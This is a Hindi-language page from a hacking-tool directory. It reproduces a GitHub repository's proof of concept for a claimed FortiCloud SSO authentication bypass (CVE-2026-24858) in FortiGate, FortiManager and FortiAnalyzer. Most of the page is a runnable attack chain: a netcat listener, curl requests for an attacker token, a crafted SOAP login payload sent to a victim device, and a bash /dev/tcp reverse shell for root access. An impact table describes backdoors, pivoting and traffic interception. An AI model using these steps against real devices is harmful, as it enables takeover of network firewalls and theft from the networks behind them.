Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-24858-FortiCloud-SSO-Authentication-Bypass — CVE-2026-24858 FortiCloud सिंगल साइन ऑन (SSO) — एक फ़ैक्टरी डिफ़ॉल्ट सक्षम सुविधा, जो किसी भी FortiGate/FortiManager/FortiAnalyzer को पंजीकृत करने पर सक्रिय हो जाती है — में एक गंभीर प्रमाणीकरण बायपास दोष शामिल है। | Kitploit
उपकरण/GitHubGitHub/absholi7ly/cve-2026-24858-forticloud-sso-authentication-bypass
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणरेड टीमिंग
GitHubabsholi7ly/cve-2026-24858-forticloud-sso-authentication-bypass

CVE-2026-24858-FortiCloud-SSO-Authentication-Bypass

CVE-2026-24858 FortiCloud सिंगल साइन ऑन (SSO) — एक फ़ैक्टरी डिफ़ॉल्ट सक्षम सुविधा, जो किसी भी FortiGate/FortiManager/FortiAnalyzer को पंजीकृत करने पर सक्रिय हो जाती है — में एक गंभीर प्रमाणीकरण बायपास दोष शामिल है।

रिपॉजिटरी देखें
95158 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-24858 | FortiCloud SSO प्रमाणीकरण बाईपास


कार्यकारी सारांश

FortiCloud सिंगल-साइन-ऑन (SSO), जो किसी भी FortiGate/FortiManager/FortiAnalyzer को पंजीकृत करने पर फैक्ट्री डिफ़ॉल्ट रूप से सक्षम सुविधा है, में एक गंभीर प्रमाणीकरण-बाईपास दोष है।

जो हमलावर किसी भी FortiCloud खाते (मुफ़्त या सशुल्क) का मालिक है, वह अपने SSO टोकन का पुनः उपयोग करके अन्य ग्राहकों के उपकरणों (नीचे सूचीबद्ध बिल्ड्स ≤) में उनके पासवर्ड जाने बिना लॉग इन कर सकता है।

पोस्ट-एक्सप्लॉइटेशन पूर्ण व्यवस्थापक GUI और रूट शेल एक्सेस प्रदान करता है, जिससे ट्रैफ़िक इंटरसेप्शन, VPN छेड़छाड़, या आंतरिक नेटवर्क में लेटरल मूवमेंट संभव होता है।

तुरंत अपग्रेड करें या पैच होने तक FortiCloud SSO अक्षम करें।


प्रभावित बिल्ड्स

उत्पादकमजोर फर्मवेयरपैच किया गया
FortiOS7.0.0–7.0.18, 7.2.0–7.2.12, 7.4.0–7.4.10, 7.6.0–7.6.5≥ 7.0.19, ≥ 7.2.13, ≥ 7.4.11, ≥ 7.6.6
FortiManager7.0.0–7.0.10, 7.2.0–7.2.5, 7.4.0–7.4.9समान major.minor+1
FortiAnalyzerसमान रेंजसमान

PoC

  1. हमलावर मशीन
    रिवर्स शेल के लिए लिसनर:

    nc -lvnp 4444
    
  2. हमलावर टोकन प्राप्त करें (15 मिनट TTL)

    curl -k -X POST https://customerapiauth.fortinet.com/api/v1/auth/token \
      -H "Content-Type: application/json" \
      -d '{"username":"[email protected]","password":"AttackerPass123"}'
    

    प्रतिक्रिया (स्निपेट):

    {"access_token":"eyJ0eXAiOiJKV1QiLCJhbGc...","expires_in":900}
    

    access_token मान कॉपी करें।

  3. बाईपास पेलोड बनाएं
    bypass.xml के रूप में सहेजें:

    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Body>
        <authRequest>
          <serialNumber>FGT80ETK21000000</serialNumber>
          <token>eyJ0eXAiOiJKV1QiLCJhbGc...</token>
          <action>login</action>
        </authRequest>
      </soapenv:Body>
    </soapenv:Envelope>
    
  4. पीड़ित को भेजें (उपरोक्त तालिका के अनुसार कोई भी फर्मवेयर ≤)

    curl -k -X POST https://<VICTIM-IP>:443/remote/logincheck \
      -H "Content-Type: application/xml" \
      --data @bypass.xml \
      -c cookies.txt
    

    HTTP 200 + Set-Cookie: APSCOOKIE=... → सफलता।

  5. व्यवस्थापक GUI ब्राउज़ करें
    ब्राउज़र खोलें या सहेजे गए कुकी के साथ curl का उपयोग करें:

    curl -k -b cookies.txt https://<VICTIM-IP>/ng/
    

    → डैशबोर्ड दिखाई देता है — कोई पासवर्ड नहीं पूछा जाता।

  6. रूट शेल (CLI विजेट)
    GUI के अंदर: Dashboard → CLI Console

    execute bash
    bash-4.4# bash -i >& /dev/tcp/192.168.8.129/4444 0>&1
    

    लिसनर प्राप्त करता है:

    root@FGT80ETK21000000:/#
    

प्रभाव

परिदृश्यपरिणाम
केवल-पठन व्यवस्थापकपूर्ण कॉन्फ़िगरेशन निर्यात करें (VPN सीक्रेट, लोकल-इन पॉलिसी, उपयोगकर्ता हैश)।
लेखन व्यवस्थापकफ़ायरवॉल नियम बदलें, स्थानीय उपयोगकर्ता बनाएं, लॉगिंग अक्षम करें, स्थायी स्क्रिप्ट इम्प्लांट करें।
रूट शेलconfig.dat डंप करें, HA कुंजियाँ निकालें, आंतरिक सबनेट में पिवट करें, बैकडोर सेवा इम्प्लांट करें।
लेटरल मूवमेंटडिवाइस फ़ुटहोल्ड बन जाता है; VLAN और SSL-VPN टनल विश्वसनीय → गहरा नेटवर्क उल्लंघन।
डेटा एक्सफ़िलट्रेशनसभी ट्रैफ़िक FortiGate से होकर गुजरता है → ट्रांसपेरेंट प्रॉक्सी + सर्टिफिकेट इंजेक्शन।
टूल डाउनलोड करें